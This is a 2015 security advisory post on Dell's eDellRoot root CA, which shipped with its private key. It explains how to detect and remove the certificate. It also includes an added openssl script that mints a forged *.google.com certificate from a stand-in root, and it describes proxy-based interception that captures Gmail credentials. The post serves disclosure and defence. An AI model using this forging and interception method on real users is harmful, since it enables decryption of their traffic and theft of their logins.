Published on November 24, 2015

Abusing Dell Rogue Root CA to Steal User Data


Dell has been shipping laptops with a rogue root CA pre-installed, similar to what happened earlier this year with SuperFish on Lenovo laptops. We will show how the root CA can be abused to steal users' data, and how to remove it safely.

Root CA

If you own a Dell laptop, click the Windows Start menu, type certmgr.msc, navigate in the left panel to Trusted Root Certification Authorities and look for a certificate entry called eDellRoot.
[Screenshot: Dell root CA (eDellRoot) in certmgr.msc]
As you can see from the image, the entry carries a small key icon, which means the certificate comes with its private key. A rogue root CA in the trusted store is bad on its own; shipping it together with the private key is far worse, because anyone who has the key can sign additional certificates that the operating system will accept as valid. Let's see in practical terms what that means.

Abusing Dell Root CA

Once you have your own root Certification Authority you can generate and sign any number of certificates: SSL, code signing, S/MIME and so on. If your CA is installed on millions of devices, you have quite some power. If you leave the private key embedded in the CA certificate, everybody suddenly has that power. Just imagine what would happen if someone created a certificate for, say, *.google.com: that someone could intercept your SSL traffic, decrypt it and inspect it without leaving a trace. We don't really have to imagine it, so let's do it. We use openssl to create a certificate for the domain(s) we would like to hijack and sign it with the CA's private key; the rest of the job is carried out by a proxy that generates the right certificates on the fly and encrypts and decrypts traffic as required. The end result looks like this; notice "This website has been verified by eDellRoot" instead of what it should really say, "Google Internet Authority":
[Screenshot: Dell hijacking Gmail, certificate "verified by eDellRoot"]
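The certificate-minting step described above, as an added example that is not part of the original post. Since the eDellRoot private key is deliberately not included here, the script generates a stand-in root CA (StandInRoot) to play its role; on an affected machine the exported eDellRoot key and certificate would take the place of root.key and root.crt. The hostname, file names and the WORK directory are assumptions made for the example. It also includes a small check, issued_by, that reports whether a given PEM certificate (for instance one exported from the Windows store or captured from a TLS session) was issued by a named CA, which is the same test a user would apply to spot an eDellRoot-signed certificate.

```shell
#!/bin/sh
# Added example (not from the original post): sign a leaf certificate for an
# arbitrary hostname with a root CA whose private key we hold, and verify that
# the leaf chains to that root. Uses a constructed stand-in root, not eDellRoot.
set -e
WORK="${WORK:-$(mktemp -d)}"   # scratch directory (assumption: writable tmp)

# Stand-in for the leaked root CA (constructed for the example).
make_root_ca() {
    openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 365 \
        -subj "/CN=StandInRoot" \
        -keyout "$WORK/root.key" -out "$WORK/root.crt" 2>/dev/null
}

# Mint a server certificate for any hostname (wildcards allowed) and sign it
# with the root's private key. This is exactly what an eDellRoot key enables.
mint_leaf() {
    host="$1"
    openssl req -new -newkey rsa:2048 -nodes -sha256 \
        -subj "/CN=$host" \
        -keyout "$WORK/leaf.key" -out "$WORK/leaf.csr" 2>/dev/null
    printf 'subjectAltName=DNS:%s\nextendedKeyUsage=serverAuth\n' "$host" \
        > "$WORK/leaf.ext"
    openssl x509 -req -in "$WORK/leaf.csr" \
        -CA "$WORK/root.crt" -CAkey "$WORK/root.key" -CAcreateserial \
        -days 90 -sha256 -extfile "$WORK/leaf.ext" \
        -out "$WORK/leaf.crt" 2>/dev/null
}

# Exit 0 if the minted leaf chains to the root in $1, non-zero otherwise.
# A client that trusts $1 would accept this leaf for the hostname.
leaf_verifies_against() {
    openssl verify -CAfile "$1" "$WORK/leaf.crt" >/dev/null 2>&1
}

# Exit 0 if the issuer of PEM certificate $1 contains the name in $2.
# Run with "eDellRoot" as $2 on a certificate a browser presented to you.
issued_by() {
    openssl x509 -in "$1" -noout -issuer | grep -q -- "$2"
}

# Interactive walk-through: call "demo" to see subject and issuer of the
# forged certificate and whether it validates against the stand-in root.
demo() {
    make_root_ca
    mint_leaf '*.google.com'
    openssl x509 -in "$WORK/leaf.crt" -noout -subject -issuer
    if leaf_verifies_against "$WORK/root.crt"; then
        echo "leaf accepted by a client trusting StandInRoot"
    else
        echo "leaf rejected"
    fi
}
```

The leaf is accepted only because the client trusts the root that signed it: the same leaf fails `openssl verify` against any other CA file, which is why a browser with its own trust store (Firefox, below) is not fooled. An intercepting proxy simply repeats mint_leaf for every hostname it sees.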
Google Chrome and Internet Explorer will not notice anything unusual, since the certificate is valid and signed by a trusted CA. Chrome uses certificate pinning to defeat external MITM (man-in-the-middle) attacks, but pins are not enforced for certificates that chain to a locally installed root, so a rogue root in the system store overrides them and MITM remains possible, as in this case.
[Screenshot: Google certificate as shown by Chrome, issued by eDellRoot]
Firefox, on the other hand, will not be fooled: Mozilla maintains its own certificate store rather than using the Windows one, so although the certificate is formally valid under Windows, Firefox rejects it. Dell's helper utility evidently does not install the root CA into the Mozilla certificate store.
[Screenshot: Firefox rejecting the eDellRoot-signed certificate]
At this point it becomes easy to peer into the encrypted SSL traffic as if it were plain HTTP, and so to steal access credentials or retrieve the user's private data. Below is a screenshot of Gmail access credentials obtained via a proxy-based MITM that is completely invisible to the local browser. Every Dell computer equipped with the rogue root CA is vulnerable to this attack.
[Screenshot: Gmail credentials captured by the MITM proxy]

Remediation

To check whether you're affected, simply visit this website: it will tell you right away whether the Dell rogue root CA is installed on your system. Removing the certificate manually won't help, because Dell Foundation Services will keep reinstalling it. To address the issue Dell released an update and a statement.

Conclusions

Every root CA has the same capabilities and the same impact as just seen; that's why keeping your system (desktop or mobile) clear of rogue CAs is important, though not easy. When a manufacturer also releases the private key, it empowers random people to create arbitrary certificates that the manufacturer's devices will accept. Root CAs should be installed only when strictly required. We are not assuming that Dell used it for evil purposes; Dell stated it was installed for support purposes, but the consequences can still be severe.
ReaQta
